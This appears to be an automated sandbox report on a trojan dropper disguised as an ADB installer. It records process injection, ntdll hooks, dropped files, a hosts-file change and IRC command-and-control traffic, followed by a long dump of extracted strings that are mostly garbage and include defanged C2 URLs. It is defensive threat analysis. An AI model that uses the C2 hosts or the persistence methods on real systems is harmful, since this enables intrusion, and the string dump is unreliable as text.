MD5: 3618e0e786d697dfb092edf82fd5e278
SHA1: 5b33fb886186a3e436d5174f14cfb19914973776
SHA256: 39df421489ec3bdb3eaadc407950d4680e72351916c5e240b5fe598a7a48498a
SSDeep: 196608:EwYvfXDBYhBpeLHe3 EPegZT3VCz0TByC Py7FU LCZAsdX3LBO:vibBYDey3PFCuByPyhRwxBB
Size: 9659089 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:38
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:928
%original file name%.exe:484
%original file name%.exe:1504
iexplore.exe:1252
Explorer.EXE:1140

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Internet Explorer\IEXPLORE.EXE (332 bytes)
%System%\Serverx.exe (1504347 bytes)

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\winusbcoinstaller2.dll (10100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinApi.dll (1862 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\adb.exe (9241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WdfCoInstaller01009.dll (12517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\winusbcoinstaller2.dll (8723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusb86.cat (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x86.exe (7803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\NOTICE.txt (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WdfCoInstaller01009.dll (12376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x64.exe (9828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WUDFUpdate_01009.dll (18515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\android_winusb.inf (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinUsbApi.dll (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusba64.cat (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\NOTICE.txt (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\install.bat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\xp\SETX.exe (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\fastboot.exe (5044 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WUDFUpdate_01009.dll (15584 bytes)

Registry activity

The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 E9 06 11 44 AD 03 63 7D 65 49 E7 B5 3A 75 CE"

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 EE 5F AE E0 40 BE F4 D2 9A BD 28 DE A1 C4 32"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

Company Name: Snoop0
Product Name: 15 seconds ADB Installer
Product Version: 1.4.
Legal Copyright:
Legal Trademarks:
Original Filename: adb-installer-1.4.3.ex
Internal Name: adb-installe
File Version: 1.4.
File Description: 15 seconds ADB Installer
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
irc.zief.pl	148.81.111.121

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN IRC Nick change on non-standard port

Traffic

NICK ccqzsjif.USER j020501 . . :#a8a67a25e Service Pack 3.JOIN #.364.



:irc 001 ccqzsjif :Hi virtu.:irc 376 ccqzsjif :End of /MOTD command.:i
rc 001 ccqzsjif :Hi virtu.:irc 376 ccqzsjif :End of /MOTD command..:cc
qzsjif JOIN #.364..:ccqzsjif JOIN #.364.

The Trojan connects to the servers at the folowing location(s):

!Require Windows

.rsrc

:=i|%dH

%X]-$pp

*{k%u

''yL

.NNNNNNNNNNNNNNNN

.NNNNNNNNNNNNNNN

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

RunProgram="waitall:install.bat"

'K.Jj

M.oU)

.pefl

.Bo%R

.CwbR

p;g%C

h.fE$=]

rH.rW

.aw$T

-t.jq

b %CtK

oM.zS

c 9%D*J=

.zw-9K)

{].zmN0

87.Fb

K-tR}

%Ure.

(..HH

S%8Si

%fJrw

mw8.KZ2

/C0%U@

.GnH0WoK*VXvrQ

.Hl>md

.zhPi

\%uFF

Ftp0r?(

HK.lY

!.HR<

.DTf(

Ihpw.NP

'>7$%d

,e.MFM3

d.Dw i

y7.SE-

|0.NGZ

ca%sW

9H.wl

UG4%f

z.Ssu'

s-n%u

8v.BC4E

2.SUO

-5TQs}

zN.Zz

E[%c_

W9-xK.YT

TM4%D

(E%F#

P.ol\ko

=:g*(

HA;%cw

^.wOW

Q8A~X .Dir

_&.lb

.nFnA

O%3Un

.aQnX

pPSkJþ

2zycMd

!;-c}-M

v.oJ8

y.Wr,

P.NWf

A%svd^

[]v%x

c[.XN

>%uZO

.Fy%H

{k%C(h.

`.wrM

'!.Ap

/ .xy:1>u

nn`Ú?

=.cxFkm

NL%FI

G%U} R

.dSOq

hsN-F%U{

X.HIU

$.Ut\

Ok%d $*

.py/(=

|q%Se

l.jDn

nuDP!

~<$.bG

H.iV*i0'?

%XSZu*W4

RrI.fW

0%ud0

Zy%UF

y.rug

.kK%l

ez8%3u=g

jM5`.xl

.kKW8%b

\.tPI

$|%SU

d4%f>

SBEW.cY

b`FLF.Ec_

.cNI3

.AI%cl

.LK9^

l=.RK

T6 .IQ

:%c.T'

f%up,

tQOw.cg

%un?2

b.kKv

F:\#F

z2.uvIE

SE.GK8

CS.JW

& .PQk

:.vNu

#y.nKO

<.MVI;c`

#w<#%u

\.eAd

]7.Uq2b

D1%FG

.mT j

%U^4p

..iR1

nQX-O4}&

I.dIJ

BT`%Cg

9Îz

.tH55

_Dj.vY Q

(.XCw

e%ui} t

*<Uurl

<.ZB|

.HDn{9

%D;aF,

jN.prVq

3;J_Wx%ut

(%x. 

n;X%dWp

D%F.B

%d%f(

W]EXey

z!%uf

<<z.Bc^

.CVB%

l _%S@

dSshx

H.GL0

)(pöH

E:\QQ

@-.Pn

%FN0$

ye.vN

.CBE)K

ZV6%Dk

pF.yu

%fR)$

%x6YI

kEyp

&TM%s

Tg.GD

R#kEY

cmdv

Q.XDu

hp.zk/

/yGk.Wn

-btB}

>%VC%fsK

.ah~e=`}O

C&.VU

a.Ja`

<9'%uM

vsY.un

r?As.Yx

9.UbU

pl%U?

J.lAW

.VK_V

.MpBkX

9.Owdy

5b=y%u

cO.sggi

#NUDpj

.eg\~,

$%c&F;E

%h%ug

:!-}[t.EU=

.mbgy~

.Dv/y6

.LoEFu

%cZvb

=.aG"

%F$Gz

}x%.Gd

R.VS> "

ko^L%xW

Û;h

a2.tk

tA.PE-

n (.mzW$

5O.drp

s6b%Sc

f-O}2e>

\W\<.Tq

\m%.DN;G

eq(%F

%D!`K

%xX,,

?}d.gwu

PH.DY

Q%D&x

%C UvT

IÚ>

.pCkxk

%X!yL

"5>\%fi

1K/L%Sc

@j.cT^o

3.MjOB

}Mg%4%D

.QJ31

y!ga.vJZ

.rX_E

O%u:>1D

W.qO;

*.*[$

%XyIR1

'q.Ha@

]E.NE

%Uz=%

>E!:.lL-

YW.QM

.Bxx^G>

]B.aZ

x.Nq 

[tj%Xa

Y(.WJ

(.rBE

U%x]|X|XZ

%C#"KN

.DzNhf6

&.BzZ

m.lP/

Z/*.dD4p

i.Chp

vWjp%SA

 7.RK5

r%s?z

Ssh6d

^.mcV

P2.kGy

JY.HnN

ue.Se

.Is~W

yË|oh

y{.Ih

e.Nde

.jq/r

.uVwv

1.oFb

I!\6w2.BW

hf.NA

*".gf$

.lZB=

..rP~

'15%F>

W%.KP

;.Ryn/

h.bBCZ9 

k%%D)w

.XhZzS(

8.ZQ'

.frQmq

=.Eka%

 .VsF

9fs%F

.xGuY

.hfVZam

1o% ]%X

G.lM5z

Q$%FG

|%f=p

e[*%D

U,4>%d

$c..Lq

-f$hO%S

E[>{Z%F

%X9e\

:.jG.

1Ul%x

/f.cHy

g%u[Q&

9;.aU

;m'%F

L&

NG5%x;

Wa.Di

.Bw8r

.Ec f

^_.Df

i%CHJ

9.fft

2z.lU=

~M%xe

D.aF8s

.mZmW~

b4OU%D

$-xX}

{[;%F

kic%X

zu.cb

@G.lh

 gk%s

7.GAk

K=.RD

n2^o

xN[.vu

{n5,%d

S.azC4

bl.jVI

fZ.FM

.knt(

.uzn|08

.qC2 

C%dlh

gc%uz-

Ix&Z%uHD

.CWr^w

3.bpd

L.ak^

.k%Fg

K$.bw

.Sld&J

n.vUg

a.mS_

)[2.TxP

.%S'p$F

V73.Sk

-bNU}

u %c%M

..Rz%

gzl%xO

i`.QC

F/.bb

%U>v%

k%uGV

%u!w>i

|Uw^.fT

!%S4s

MUj.AF

{$Ý

pAr%d-

.KmVX{

#(.lV

{.Nc3

KO.We

:-QEX.BU

l5:

Ôb~

.PEJl

olB<NNll6.NMl

[email protected]

|k-Q}

d%d!m

F%uo<r

#.ibEd

3%Xv0s

[4 ?.YW

FtPa

<m3

s.sd~

.rPV6k$

.GLxQg

.Sfb>

%URC=

d%.KS-

,%U c

0p.Aq

l>.Rl

1ki.Mg

.NB%*

;S%x%T

F\.ue

.aO^.s>

.Xf s|;

.VdP=

S.zy;

e}%s#;

m.RT 

ðIm

..RTH

.pKpaX

U-.sr

T2%UN

&a.Os

.jgZok

{n%fPym

/Cj~.YD

!E.ky

.vQ[M

Hua~%S r

~ .cw

.vIXff

!z6'.LD

_.xQ'

V.rX{

)xPp%D

1.hIe

N..JF"b^wN#

.OL<GD'pO#Bjw1

ûp U

cq.OT

.LjVZ

.jN_Q

LYs8.pr

<#.gajY

.Tkwt7z

PfTp0

8E.CI

.hL\39

5Y7%F

C%8UF

gV%xMLc

i^.AAE

Vc.en

_V2.oPC&

^]-Y}

r.fo7=}m

.ldEJ

S{Eu%D

n.yoM

%D!Dl

k%X&a

$%X0B

g3}

%F&#\

%x1'"

zFTP

US.pGc

.vJMI

T2.el

$%.zf

5\5?5.5:50

uvŒB

%\V<.Tf

.act_

%C;R@

P&4K%S

0S.cy?)G

#.$;';)@

.Xf]U

tQ>%x

0u.oAP

.wz{h_Vc

.Mb[|

2Yg/D%S

-1pd}

#HF%xX.

"#.md

%UZ5=

O%d,w

@@@@.As

k.aIh

~S3%c

w.apsQ_

,p%F/zE

%U/&!ru

 P.MF

_7%cg?

\*%UG

$Y%x$

w.II"!,

.Qtd@

=A1%sgu

.zNKZ

(%XZG$

%x<s%

\.OyX

.xGDB{

[.fod

u-o}k

!| Ev@l%x

.AVW,

\.RbC

-n.mb

op}{%c

7&.gr_

e/x.uu?

G%u9/e

\@W.cC

"Q.Qq

/.Hk*

Di.kLJ

N.LK*

.MN:un

.JS_J

-v.AB@

LK.ay

2=.nU

}õ;#

.wwwwwwww`w

;:f%c

C!.iT

MO..ZH<

.EA0p

vg%uFGd

&I.UR

;.ce-

AHm%D

Mg%u>

M%0s<;

.xFyZ

D|%x$K

Ec.yj

S.Lk!u"~

[R.aC

AZ#5.ZN

-q}:"

Ln%Sw

iW%dM

:.qhlVfi

| %SZQ0

ac%U T

7S.tJM

6K.tm

.pLjxO

8]R.vd

"j.hu

}1kÝ

X.ZP_G

6 \r<`(-.kY?

%x~{d

&kj%sO)

.WS1s

.Dwi^

^.jY.zr

s.CELM<W

nE.GD

jyy.Er7{

#].nv

z .eJ

.DBd1[

9.Fl#}

V#.mp

%C@K'

.kJ*A

{1.cu

.ByYk

UA.jZ

.cr`5]

1^Tzo

xq.Iuj

299.Ai

T)%u=Q

 E.jKk

>O~

.jvoB

8.zO&T

.xbF!

i %s|

O?Ce.Ih

s3%d(

0.hv4

þ(#

@7%x8

1%f$uqr

WQm

bX%U=]

mj.nm

]9.jDmI

z%Cga(

r|5.VZ

lO.pT

J[m%CR

.wgaR

%.bB^

\X.Vo

&U(.fR

a.xxPZ

.RejS

.hMdzC

%9UGl*

-{.rK

-Op}o

.eOG8Yt

wEbM

`0818%8!*

QHX5g.qe

q&A.RSU

I%.Ar\

ZB.ur

\mc%x

j,Ò

b_%uF

A>%F ;

.KuAC

R"~.QA

%X-Wd

-v4}I2

.iYf$

gTexE

/-1v}

ls.yM

]DD.SU

U&%SG

,Y^%%UN

X*%sf

%Œ|

5N.zb

(udpb

d.TL^

lftp

o>M%%U7

.TOv`g

1b.mL

525<1mSg

:%SqN

%DOJw

!b*C.kR*

.By9h_

.azzm

b%ukY`

xB-i}

eul-

?hD0%c

".bggo

%S/6gbM

p"$.vB

1Å4

f.DaifL*

t~=v%S."

1.zQXa

$c%u7

G?J

ue<œ

%D-2yx

6q)%F

>>@.Eal

".yUH

6,$=%X

::%d_

j%dp\

1n.Vz

Ye.lG

O8O

M^v%X

!.NE&

/T)J%c

Tu, .ua

i.lNG

{,.yC

/ .An

w.OP0@

{.FAz

Ko%uR

%So&yk

S.OHNR

C.HQ6Dk 

.pJ2S:

dzœ

`%7XE

"H%Xz:J/|C

%S$RK

7N$%c

W%C]ei

d-wQ}

O_9%Fq

IL.rK

%f"nf

H|D%c

K%7sW

Y.yi8

Z.zZ6;X

gV.fp

~-M}<

urI.;%F

=.KpJ@

|.PXm

=%XFJ{

9g6.yu5

8>%xV

.DH.2

s`tS-C}

R.rxtqE="n

F.Cky"

.cXEd

Bh'.Ck1

R.ee:dNx

I5[%S

U5g--Z}

~Y%SY

6.oHoTn

(gSqL

@%C%E%

CMd0Z

K-.wS$r

m$].wp.

(C.SG

A!N'%u

%syePt

%u_JA

%3XJ?

gV&.tp(

f-.tua

}o.Fd

%xm_a/

E-Tl}

EZG%X

}.ow.

m=.Up]

.gB5Dn

l.Pe1

%dh:IN)-

V.pzvq

:O.ra

u.Wz/

.Nc[S

Ze.vf

..pon

=fP.KBr

P%xy-_

R%FP(Q

.aGWYb

8`%S.

.NBYb

U.qcD

X$%c)

^msgj7

.beVOd

.cwydm

%XB`.s

%uf9r

.lfjR

.HKl4G;

m%dy5

7Þ1

%Dw"l

$WL`D

B.OYXh1^

T.Os;b

.bGvW

z1#%sO

|.LCe

..bWL

'}Dp%X

j[ftpV~x

-ùh

<9.CI)

T%C\l 

quDP`5!

tcP2sd

D}.BM

S;.QvS`

%U{[7

%ct.Y

E%s%V

-y%S;O

.USp!s

.mxz*

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

A.HK30

1.4.3

adb-installer-1.4.3.exe

%original file name%.exe_928_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

1.4.3

adb-installer-1.4.3.exe

%original file name%.exe_928_rwx_00D95000_00002000:

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

%original file name%.exe_1504:

!Require Windows

`.rsrc

PSSSSSSh

<x%u<

ttNt_Nt.Nt

:Language:%u

Enter password:

0xx

"%s".

Could not overwrite file "%s".

Could not create file "%s".

0xX.

7-Zip: Internal error, code 0xX.

7-Zip: Internal error, code %u.

The archive is corrupted, or invalid password was entered.

7-Zip: Unsupported method.

Error during execution "%s".

"setup.exe"

Could not find "setup.exe".

Could not find command for "%s".

Could not delete file or folder "%s".

Could not create folder "%s".

Error in line %d of configuration data:

Could not open archive file "%s".

1.6.0 develop [x86]

2712 (30

1.6.0 develop [x86] build 2712 (December 30, 2012)

Supported methods and filters, build options:

Sorry, this program requires Microsoft Windows 2000 or later.

CreateIoCompletionPort

_acmdln

ShellExecuteW

ShellExecuteExW

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

.text

`.rdata

@.data

.rsrc

.NNNNNNNNNNNNNNNN

.NNNNNNNNNNNNNNN

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

RunProgram="waitall:install.bat"

'K.Jj

M.oU)

.pefl

.Bo%R

.CwbR

p;g%C

h.fE$=]

rH.rW

.aw$T

-t.jq

b %CtK

oM.zS

c 9%D*J=

.zw-9K)

{].zmN0

87.Fb

K-tR}

%Ure.

(..HH

S%8Si

%fJrw

mw8.KZ2

/C0%U@

.GnH0WoK*VXvrQ

.Hl>md

.zhPi

\%uFF

Ftp0r?(

HK.lY

!.HR<

.DTf(

Ihpw.NP

'>7$%d

,e.MFM3

d.Dw i

y7.SE-

|0.NGZ

ca%sW

9H.wl

UG4%f

z.Ssu'

s-n%u

8v.BC4E

2.SUO

-5TQs}

zN.Zz

E[%c_

W9-xK.YT

TM4%D

(E%F#

P.ol\ko

=:g*(

HA;%cw

^.wOW

Q8A~X .Dir

_&.lb

.nFnA

O%3Un

.aQnX

pPSkJþ

2zycMd

!;-c}-M

v.oJ8

y.Wr,

P.NWf

A%svd^

[]v%x

c[.XN

>%uZO

.Fy%H

{k%C(h.

`.wrM

'!.Ap

/ .xy:1>u

nn`Ú?

=.cxFkm

NL%FI

G%U} R

.dSOq

hsN-F%U{

X.HIU

$.Ut\

Ok%d $*

.py/(=

|q%Se

l.jDn

nuDP!

~<$.bG

H.iV*i0'?

%XSZu*W4

RrI.fW

0%ud0

Zy%UF

y.rug

.kK%l

ez8%3u=g

jM5`.xl

.kKW8%b

\.tPI

$|%SU

d4%f>

SBEW.cY

b`FLF.Ec_

.cNI3

.AI%cl

.LK9^

l=.RK

T6 .IQ

:%c.T'

f%up,

tQOw.cg

%un?2

b.kKv

F:\#F

z2.uvIE

SE.GK8

CS.JW

& .PQk

:.vNu

#y.nKO

<.MVI;c`

#w<#%u

\.eAd

]7.Uq2b

D1%FG

.mT j

%U^4p

..iR1

nQX-O4}&

I.dIJ

BT`%Cg

9Îz

.tH55

_Dj.vY Q

(.XCw

e%ui} t

*<Uurl

<.ZB|

.HDn{9

%D;aF,

jN.prVq

3;J_Wx%ut

(%x. 

n;X%dWp

D%F.B

%d%f(

W]EXey

z!%uf

<<z.Bc^

.CVB%

l _%S@

dSshx

H.GL0

)(pöH

E:\QQ

@-.Pn

%FN0$

ye.vN

.CBE)K

ZV6%Dk

pF.yu

%fR)$

%x6YI

kEyp

&TM%s

Tg.GD

R#kEY

cmdv

Q.XDu

hp.zk/

/yGk.Wn

-btB}

>%VC%fsK

.ah~e=`}O

C&.VU

a.Ja`

<9'%uM

vsY.un

r?As.Yx

9.UbU

pl%U?

J.lAW

.VK_V

.MpBkX

9.Owdy

5b=y%u

cO.sggi

#NUDpj

.eg\~,

$%c&F;E

%h%ug

:!-}[t.EU=

.mbgy~

.Dv/y6

.LoEFu

%cZvb

=.aG"

%F$Gz

}x%.Gd

R.VS> "

ko^L%xW

Û;h

a2.tk

tA.PE-

n (.mzW$

5O.drp

s6b%Sc

f-O}2e>

\W\<.Tq

\m%.DN;G

eq(%F

%D!`K

%xX,,

?}d.gwu

PH.DY

Q%D&x

%C UvT

IÚ>

.pCkxk

%X!yL

"5>\%fi

1K/L%Sc

@j.cT^o

3.MjOB

}Mg%4%D

.QJ31

y!ga.vJZ

.rX_E

O%u:>1D

W.qO;

*.*[$

%XyIR1

'q.Ha@

]E.NE

%Uz=%

>E!:.lL-

YW.QM

.Bxx^G>

]B.aZ

x.Nq 

[tj%Xa

Y(.WJ

(.rBE

U%x]|X|XZ

%C#"KN

.DzNhf6

&.BzZ

m.lP/

Z/*.dD4p

i.Chp

vWjp%SA

 7.RK5

r%s?z

Ssh6d

^.mcV

P2.kGy

JY.HnN

ue.Se

.Is~W

yË|oh

y{.Ih

e.Nde

.jq/r

.uVwv

1.oFb

I!\6w2.BW

hf.NA

*".gf$

.lZB=

..rP~

'15%F>

W%.KP

;.Ryn/

h.bBCZ9 

k%%D)w

.XhZzS(

8.ZQ'

.frQmq

=.Eka%

 .VsF

9fs%F

.xGuY

.hfVZam

1o% ]%X

G.lM5z

Q$%FG

|%f=p

e[*%D

U,4>%d

$c..Lq

-f$hO%S

E[>{Z%F

%X9e\

:.jG.

1Ul%x

/f.cHy

g%u[Q&

9;.aU

;m'%F

L&

NG5%x;

Wa.Di

.Bw8r

.Ec f

^_.Df

i%CHJ

9.fft

2z.lU=

~M%xe

D.aF8s

.mZmW~

b4OU%D

$-xX}

{[;%F

kic%X

zu.cb

@G.lh

 gk%s

7.GAk

K=.RD

n2^o

xN[.vu

{n5,%d

S.azC4

bl.jVI

fZ.FM

.knt(

.uzn|08

.qC2 

C%dlh

gc%uz-

Ix&Z%uHD

.CWr^w

3.bpd

L.ak^

.k%Fg

K$.bw

.Sld&J

n.vUg

a.mS_

)[2.TxP

.%S'p$F

V73.Sk

-bNU}

u %c%M

..Rz%

gzl%xO

i`.QC

F/.bb

%U>v%

k%uGV

%u!w>i

|Uw^.fT

!%S4s

MUj.AF

{$Ý

pAr%d-

.KmVX{

#(.lV

{.Nc3

KO.We

:-QEX.BU

l5:

Ôb~

.PEJl

olB<NNll6.NMl

[email protected]

|k-Q}

d%d!m

F%uo<r

#.ibEd

3%Xv0s

[4 ?.YW

FtPa

<m3

s.sd~

.rPV6k$

.GLxQg

.Sfb>

%URC=

d%.KS-

,%U c

0p.Aq

l>.Rl

1ki.Mg

.NB%*

;S%x%T

F\.ue

.aO^.s>

.Xf s|;

.VdP=

S.zy;

e}%s#;

m.RT 

ðIm

..RTH

.pKpaX

U-.sr

T2%UN

&a.Os

.jgZok

{n%fPym

/Cj~.YD

!E.ky

.vQ[M

Hua~%S r

~ .cw

.vIXff

!z6'.LD

_.xQ'

V.rX{

)xPp%D

1.hIe

N..JF"b^wN#

.OL<GD'pO#Bjw1

ûp U

cq.OT

.LjVZ

.jN_Q

LYs8.pr

<#.gajY

.Tkwt7z

PfTp0

8E.CI

.hL\39

5Y7%F

C%8UF

gV%xMLc

i^.AAE

Vc.en

_V2.oPC&

^]-Y}

r.fo7=}m

.ldEJ

S{Eu%D

n.yoM

%D!Dl

k%X&a

$%X0B

g3}

%F&#\

%x1'"

zFTP

US.pGc

.vJMI

T2.el

$%.zf

5\5?5.5:50

uvŒB

%\V<.Tf

.act_

%C;R@

P&4K%S

0S.cy?)G

#.$;';)@

.Xf]U

tQ>%x

0u.oAP

.wz{h_Vc

.Mb[|

2Yg/D%S

-1pd}

#HF%xX.

"#.md

%UZ5=

O%d,w

@@@@.As

k.aIh

~S3%c

w.apsQ_

,p%F/zE

%U/&!ru

 P.MF

_7%cg?

\*%UG

$Y%x$

w.II"!,

.Qtd@

=A1%sgu

.zNKZ

(%XZG$

%x<s%

\.OyX

.xGDB{

[.fod

u-o}k

!| Ev@l%x

.AVW,

\.RbC

-n.mb

op}{%c

7&.gr_

e/x.uu?

G%u9/e

\@W.cC

"Q.Qq

/.Hk*

Di.kLJ

N.LK*

.MN:un

.JS_J

-v.AB@

LK.ay

2=.nU

}õ;#

.wwwwwwww`w

;:f%c

C!.iT

MO..ZH<

.EA0p

vg%uFGd

&I.UR

;.ce-

AHm%D

Mg%u>

M%0s<;

.xFyZ

D|%x$K

Ec.yj

S.Lk!u"~

[R.aC

AZ#5.ZN

-q}:"

Ln%Sw

iW%dM

:.qhlVfi

| %SZQ0

ac%U T

7S.tJM

6K.tm

.pLjxO

8]R.vd

"j.hu

}1kÝ

X.ZP_G

6 \r<`(-.kY?

%x~{d

&kj%sO)

.WS1s

.Dwi^

^.jY.zr

s.CELM<W

nE.GD

jyy.Er7{

#].nv

z .eJ

.DBd1[

9.Fl#}

V#.mp

%C@K'

.kJ*A

{1.cu

.ByYk

UA.jZ

.cr`5]

1^Tzo

xq.Iuj

299.Ai

T)%u=Q

 E.jKk

>O~

.jvoB

8.zO&T

.xbF!

i %s|

O?Ce.Ih

s3%d(

0.hv4

þ(#

@7%x8

1%f$uqr

WQm

bX%U=]

mj.nm

]9.jDmI

z%Cga(

r|5.VZ

lO.pT

J[m%CR

.wgaR

%.bB^

\X.Vo

&U(.fR

a.xxPZ

.RejS

.hMdzC

%9UGl*

-{.rK

-Op}o

.eOG8Yt

wEbM

`0818%8!*

QHX5g.qe

q&A.RSU

I%.Ar\

ZB.ur

\mc%x

j,Ò

b_%uF

A>%F ;

.KuAC

R"~.QA

%X-Wd

-v4}I2

.iYf$

gTexE

/-1v}

ls.yM

]DD.SU

U&%SG

,Y^%%UN

X*%sf

%Œ|

5N.zb

(udpb

d.TL^

lftp

o>M%%U7

.TOv`g

1b.mL

525<1mSg

:%SqN

%DOJw

!b*C.kR*

.By9h_

.azzm

b%ukY`

xB-i}

eul-

?hD0%c

".bggo

%S/6gbM

p"$.vB

1Å4

f.DaifL*

t~=v%S."

1.zQXa

$c%u7

G?J

ue<œ

%D-2yx

6q)%F

>>@.Eal

".yUH

6,$=%X

::%d_

j%dp\

1n.Vz

Ye.lG

O8O

M^v%X

!.NE&

/T)J%c

Tu, .ua

i.lNG

{,.yC

/ .An

w.OP0@

{.FAz

Ko%uR

%So&yk

S.OHNR

C.HQ6Dk 

.pJ2S:

dzœ

`%7XE

"H%Xz:J/|C

%S$RK

7N$%c

W%C]ei

d-wQ}

O_9%Fq

IL.rK

%f"nf

H|D%c

K%7sW

Y.yi8

Z.zZ6;X

gV.fp

~-M}<

urI.;%F

=.KpJ@

|.PXm

=%XFJ{

9g6.yu5

8>%xV

.DH.2

s`tS-C}

R.rxtqE="n

F.Cky"

.cXEd

Bh'.Ck1

R.ee:dNx

I5[%S

U5g--Z}

~Y%SY

6.oHoTn

(gSqL

@%C%E%

CMd0Z

K-.wS$r

m$].wp.

(C.SG

A!N'%u

%syePt

%u_JA

%3XJ?

gV&.tp(

f-.tua

}o.Fd

%xm_a/

E-Tl}

EZG%X

}.ow.

m=.Up]

.gB5Dn

l.Pe1

%dh:IN)-

V.pzvq

:O.ra

u.Wz/

.Nc[S

Ze.vf

..pon

=fP.KBr

P%xy-_

R%FP(Q

.aGWYb

8`%S.

.NBYb

U.qcD

X$%c)

^msgj7

.beVOd

.cwydm

%XB`.s

%uf9r

.lfjR

.HKl4G;

m%dy5

7Þ1

%Dw"l

$WL`D

B.OYXh1^

T.Os;b

.bGvW

z1#%sO

